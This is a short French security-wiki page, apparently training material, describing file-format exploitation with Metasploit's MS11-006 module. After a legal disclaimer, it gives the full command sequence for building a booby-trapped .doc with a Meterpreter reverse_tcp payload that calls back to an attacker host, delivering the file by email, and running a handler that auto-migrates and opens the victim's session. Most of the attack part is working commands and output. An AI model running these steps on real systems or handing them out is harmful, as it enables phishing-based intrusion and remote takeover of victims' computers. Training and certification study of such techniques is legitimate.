Fichiers exploit
🔒 Contenu de sécurité — usage encadré
Cette page décrit des techniques de sécurité offensive à des fins exclusivement pédagogiques et professionnelles (formation, préparation de certification, montée en compétence défensive).
Ces techniques ne doivent être mises en œuvre que dans un laboratoire isolé ou sur un système pour lequel vous disposez d'une autorisation écrite explicite du propriétaire. Les employer contre un système tiers sans autorisation est une infraction pénale (art. 323-1 et suivants du Code pénal). Voir les avertissements généraux.
| Fiche express | |
|---|---|
| Domaine | Exploitation par format de fichier |
| Module | windows/fileformat/ms11_006_createsizeddibsection
|
| Contexte | Metasploit |
| Voir aussi | Adobe pdf embedded exe · Meterpreter |
Exploitation via des formats de fichiers (PDF, DOC…). L'exemple s'appuie sur la faille Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow (MS11-006).
Génération du fichier piégé
search ms11_006
use exploit/windows/fileformat/ms11_006_createsizeddibsection
info
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.12
set LPORT 443
exploit
# [+] msf.doc created at /root/.msf4/local/msf.doc
Livraison et handler
Le fichier est envoyé par courriel ; à son ouverture, le payload se connecte au handler qu'il faut avoir activé :
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.12
set LPORT 443
set AutoRunScript migrate -f
exploit -j
sessions -i 1
Voir aussi
- Adobe pdf embedded exe — variante PDF
- Meterpreter